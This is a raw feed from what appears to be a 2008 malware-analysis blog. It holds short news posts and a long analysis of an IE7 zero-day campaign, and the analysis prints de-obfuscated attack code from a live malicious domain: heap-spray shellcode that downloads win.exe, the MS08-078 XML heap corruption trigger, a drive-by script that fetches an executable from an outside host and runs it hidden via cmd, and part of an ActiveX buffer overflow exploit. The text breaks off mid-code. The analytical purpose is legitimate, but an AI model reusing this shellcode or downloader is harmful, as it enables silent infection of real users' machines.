class="MsoNormal"&gt; &lt;br /&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;References:&lt;/p&gt;  &lt;p class="MsoNormal"&gt; &lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:11;"&gt;&lt;a href="http://www.sans.org/newsletters/risk/display.php?v=7&amp;amp;i=50#widely10"&gt;http://www.sans.org/newsletters/risk/display.php?v=7&amp;amp;i=50#widely10&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:11;"&gt;&lt;a href="http://securitytracker.com/alerts/2008/Dec/1021363.html"&gt;http://securitytracker.com/alerts/2008/Dec/1021363.html&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:11;"&gt;&lt;a href="http://www.milw0rm.com/exploits/7501"&gt;http://www.milw0rm.com/exploits/7501&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:11;"&gt;&lt;a href="http://www.securityfocus.com/bid/32710/discuss"&gt;http://www.securityfocus.com/bid/32710/discuss&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=";font-family:SymantecSans;font-size:11;"  &gt; &lt;/span&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-5925108898657823567?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/5925108898657823567/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=5925108898657823567' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5925108898657823567'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5925108898657823567'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/new-zero-day-on-microsoft-sql-server.html' title='New Zero day on Microsoft SQL Server Stored Procedure &apos;sp_replwritetovarbin&apos;'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-297348384564017808</id><published>2008-12-22T12:46:00.001-08:00</published><updated>2008-12-22T12:46:22.647-08:00</updated><title type='text'>Internet is too slow from Past few days......</title><content type='html'>As you all may be facing a problem in using internet from past 2-3 days, &lt;br&gt;the reason is that communications cables between the Middle East and Europe were disrupted, which was connecting Italy and Egypt in the Mediterranean Sea were damaged.&lt;br&gt;&lt;br&gt;&lt;br&gt;read the full story here&lt;br&gt;&lt;a href="http://www.bloomberg.com/apps/news?pid=20601085&amp;amp;sid=aH.VPx226QVo&amp;amp;refer=europe"&gt;http://www.bloomberg.com/apps/news?pid=20601085&amp;amp;sid=aH.VPx226QVo&amp;amp;refer=europe&lt;/a&gt;&lt;br&gt; &lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-297348384564017808?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/297348384564017808/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=297348384564017808' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/297348384564017808'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/297348384564017808'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/internet-is-too-slow-from-past-few-days.html' title='Internet is too slow from Past few days......'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-3117221595325277054</id><published>2008-12-22T12:42:00.000-08:00</published><updated>2008-12-22T12:44:48.124-08:00</updated><title type='text'>Relief for MAC users Now, from Viruses......</title><content type='html'>Symantec has released anti virus for MAC OS, &lt;br&gt;&lt;br&gt;Some of the features are as follows....&lt;br&gt;&lt;br&gt;&lt;ul class="listSQbl"&gt;&lt;li&gt;Antiphishing&lt;/li&gt;&lt;li&gt;Identity protection&lt;/li&gt;&lt;li&gt;Internet worm protection&lt;/li&gt;&lt;li&gt;Two-way firewall&lt;/li&gt; &lt;li&gt;Vulnerability protection&lt;/li&gt;&lt;li&gt;Integrated, nonintrusive security suite with a simple, easy-to-use interface that includes protection found in Norton AntiVirus™ 11 for Mac&amp;reg;, Norton™ Confidential, and two-way firewall functionality.&lt;/li&gt;&lt;li&gt;Automatically detects and removes spyware, viruses, Trojan horses, malware, and Internet worms.&lt;/li&gt;&lt;li&gt;Detects and automatically removes online threats.&lt;/li&gt; &lt;li&gt;Scans and cleans downloaded files and email attachments.&lt;/li&gt;&lt;li&gt;Monitors email and instant messages for threats so you can exchange files freely.&lt;/li&gt;&lt;/ul&gt;For further details and download of the AntiVirus software please visit.&lt;br&gt; &lt;br&gt;&lt;a href="http://www.symantec.com/norton/macintosh/internet-security"&gt;http://www.symantec.com/norton/macintosh/internet-security&lt;/a&gt;&lt;br&gt;&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-3117221595325277054?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/3117221595325277054/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=3117221595325277054' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/3117221595325277054'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/3117221595325277054'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/relief-for-mac-users-now-from-viruses.html' title='Relief for MAC users Now, from Viruses......'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-8264426379107225441</id><published>2008-12-22T12:22:00.001-08:00</published><updated>2008-12-22T12:22:56.331-08:00</updated><title type='text'>New Posts to Come...</title><content type='html'>Hi All readers there is a new article coming up in Rootkits very shortly....&lt;br&gt;Please do keep checking on the blog....&lt;br&gt;&lt;br&gt;&lt;br&gt;Regards&lt;br&gt;W&amp;amp;E&lt;br&gt;&amp;nbsp; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-8264426379107225441?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/8264426379107225441/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=8264426379107225441' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8264426379107225441'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8264426379107225441'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/new-posts-to-come.html' title='New Posts to Come...'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-4842529035399534678</id><published>2008-12-19T11:13:00.001-08:00</published><updated>2008-12-19T11:14:00.045-08:00</updated><title type='text'>Chinese doing Corporate espionage.....on Indian IT Firms</title><content type='html'>&amp;quot;.......A few months ago, a major Bangalore-based infotech company lost out on a $8 million contract. The company was expecting a business delegation to visit India before signing the contract, but 15 days before the date set for the deal, the meeting was abruptly called off.&lt;br&gt;&lt;br&gt;The same team went to China instead. When the Indian firm investigated the matter, it discovered a gaping hole in its security. The computers of several of its top executives had been compromised by Chinese hackers and privileged information leaked to a Chinese competitor, who walked away with the deal by quoting a lesser price.&lt;br&gt;&lt;br&gt;Welcome to war of another kind - corporate espionage.........&amp;quot;&lt;br&gt;&lt;br&gt;Read the full story here &lt;a href="http://www.dnaindia.com/report.asp?newsid=1213993&amp;amp;pageid=0"&gt;http://www.dnaindia.com/report.asp?newsid=1213993&amp;amp;pageid=0&lt;/a&gt;&lt;br&gt; &lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-4842529035399534678?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/4842529035399534678/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=4842529035399534678' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/4842529035399534678'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/4842529035399534678'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/chinese-doing-corporate-espionageon.html' title='Chinese doing Corporate espionage.....on Indian IT Firms'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-804517309334066652</id><published>2008-12-19T02:16:00.001-08:00</published><updated>2008-12-31T00:53:21.701-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IE 7 Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='MS-08078'/><category scheme='http://www.blogger.com/atom/ns#' term='IE 7 Bug Fix'/><category scheme='http://www.blogger.com/atom/ns#' term='new worm'/><category scheme='http://www.blogger.com/atom/ns#' term='IE 7 Zero Day'/><category scheme='http://www.blogger.com/atom/ns#' term='MS08-078 var shellcode'/><title type='text'>IE 7 Zero day Exploit delivering Domain Demystified</title><content type='html'>Hi all, i was observing the internet community was facing the heat of IE 7 zero day exploits being on the wild. I came accross some domains who are hosting the malwares for IE7, it was using IE 7 XML heap corruption, Snapshot Viewer Activex Exploit, NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit, and many others. I tried to decode the obfuscation at multiple locations in the website, the decoded versions are given below with the locations of the files.&lt;div class="gmail_quote"&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;Domain: 17gamo . com&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;Malware Information:&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;&lt;a href="http://safeweb.norton.com/report/show?url=www.17gamo.com&amp;amp;x=0&amp;amp;y=0" target="_blank"&gt;http://safeweb.norton.com/report/show?url=www.17gamo.com&amp;amp;x=0&amp;amp;y=0&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;Location 1: IE 7 Zero day Exploit.&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;http://[BLOCKED]17gamo.com/co/ie7 . htm&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;Exploit used: IE XML Heap Corruption exploit&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;The De-obfuscated Code:&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;----------------------------------------------------------------------------------------------------------------------&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Var shellcode=unescape("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u772f%u7777%u732e%u6574%u6f6f%u632e%u6d6f%u612f%u6d64%u6e69%u772f%u6e69%u652e%u6578%u0000");&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var spray=unescape("%u0a0a%u0a0a");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;do&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;{&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;spray+=spray&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;}&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;while(spray.length&amp;lt;851968);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;memory=new Array();&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;for(i=0;i&amp;lt;100;i++)&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;memory[i]=spray+shellcode;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;xmlcode="&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;image SRC=http://&amp;amp;#x0a0a;&amp;amp;#x0a0a;.xiaolen .com&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;XML ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;lt;/SPAN&amp;gt;";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;tag=document.getElementById("Ie70day");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;tag.innerHTML=xmlcode;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;----------------------------------------------------------------------------------------------------------------------&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;This is the exact code presented by HD Moore and otheres in MilWorm, only changes are the shellcode and the SRC=http://&amp;amp;#x0a0a;&amp;amp;#x0a0a;.xiaolen .com, i checked the domain xiaolen .com, its still alive,&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;a href="http://www.milw0rm.com/exploits/7477" target="_blank"&gt;http://www.milw0rm.com/exploits/7477&lt;/a&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;Remedy and Removal:&lt;/b&gt;&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;a href="http://wormsandexploits.blogspot.com/2008/12/microsoft-released-security-advisory.html" target="_blank"&gt;http://wormsandexploits.blogspot.com/2008/12/microsoft-released-security-advisory.html&lt;/a&gt;&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;Location 2: Drive By Download method used to download the malware by exploiting the XMLHTTP object of IE 7 Exploit used&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;http://[BLOCKED].17gamo.com/co/14 . htm&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;The De-obfuscated Code:&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;----------------------------------------------------------------------------------------------------------------------&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee='http:// [REMOVED] steoo . com/admin/win.exe';&lt;/p&gt;&lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeename='Gameeeeee.pif';&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeenames='Gameeeeee.vbs';&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;avastt=window.document.createElement("object");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gamex= 'Shell.Application';&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeeeex= 'clsid:BD96C556-65A3-11D0-983A-00C04FC29E36';&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;avastt.setAttribute("classid",Gameeeeex);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeexml="Microsoft.XMLHTTP";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeeado="Adodb.Stream";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var severr=avastt.CreateObject("Scripting.FileSystemObject","");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee2=avastt.CreateObject(Gameeexml,"");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3=avastt.CreateObject(Gameeeado,"");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.type=1;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;swwsmerrr=severr.GetSpecialFolder(0);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;sghgdddd=avastt.CreateObject(Gamex,"");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;exp1=severr.BuildPath(swwsmerrr+'\\system32','cmd.exe');&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;wwwGameeecn=swwsmerrr+"\\"+Gameeename;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee2.Open("GET",Gameee,0);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee2.send();&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.Open();&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.Write(Gameee2.responseBody);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.SaveToFile.(wwwGameeecn,2);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.Close();&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeeuser="avastt";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;wwwGameeecn2=swwsmerrr+"\\"+Gameeenames;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeezf0="Set wwwGameeecn = CreateObject(\"Wscript.";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeezf="Shell\")\n";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeezfs="wwwGameeecn.run \"cmd /c "+wwwGameeecn+"\",vbhide";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeezfx=Gameeezf0+Gameeezf+Gameeezfs;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.type=2;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.Open();&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.WriteText=Gameeezfx;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.Savetofile(wwwGameeecn2,2);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameee3.Close();&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameees="o";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeess="p";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeesss="e";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeessss="n";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;Gameeex='open';&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;sghgdddd.ShelLExeCute(exp1,' /c '+wwwGameeecn2,"",Gameeex,0)&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;----------------------------------------------------------------------------------------------------------------------&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;As you can see that the exploit is trying to downlioad "win.exe" which is a malicious file, and is detected as &lt;a href="http://w32.imaut.as/" target="_blank"&gt;W32.Imaut.AS&lt;/a&gt; by Symantec, the full details with removal instructions are provided here&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2007-080114-2713-99&amp;amp;tabid=2" target="_blank"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2007-080114-2713-99&amp;amp;tabid=2&lt;/a&gt;&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;Location 3: It is hosting NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit for IE 7&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;http://[BLOCKED].17gamo.com/co/nct . htm&lt;/p&gt;&lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;b&gt;The De-obfuscated Code:&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;----------------------------------------------------------------------------------------------------------------------&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;test="game";&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var sCode=unescape("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u772f%u7777%u732e%u6574%u6f6f%u632e%u6d6f%u612f%u6d64%u6e69%u772f%u6e69%u652e%u6578%u0000");&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var sSlide=unescape("%u9090%u9090");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var heapSA=0x0c0c0c0c;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;function tryMe()&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;{&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;var buffSize=5200;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;var x=unescape("%0c%0c%0c%0c");&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;while(x.length&amp;lt;buffSize)x+=x;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;x=x.substring(0,buffSize);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;boom.SetFormatLikeSample(x)&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;}&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;function getsSlide(sSlide,sSlideSize)&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;{&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;while(sSlide.length*2&amp;lt;sSlideSize)&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;{&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;        &lt;/span&gt;sSlide+=sSlide&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;}&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;sSlide=sSlide.substring(0,sSlideSize/2);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;return(sSlide)&lt;/p&gt;  &lt;p 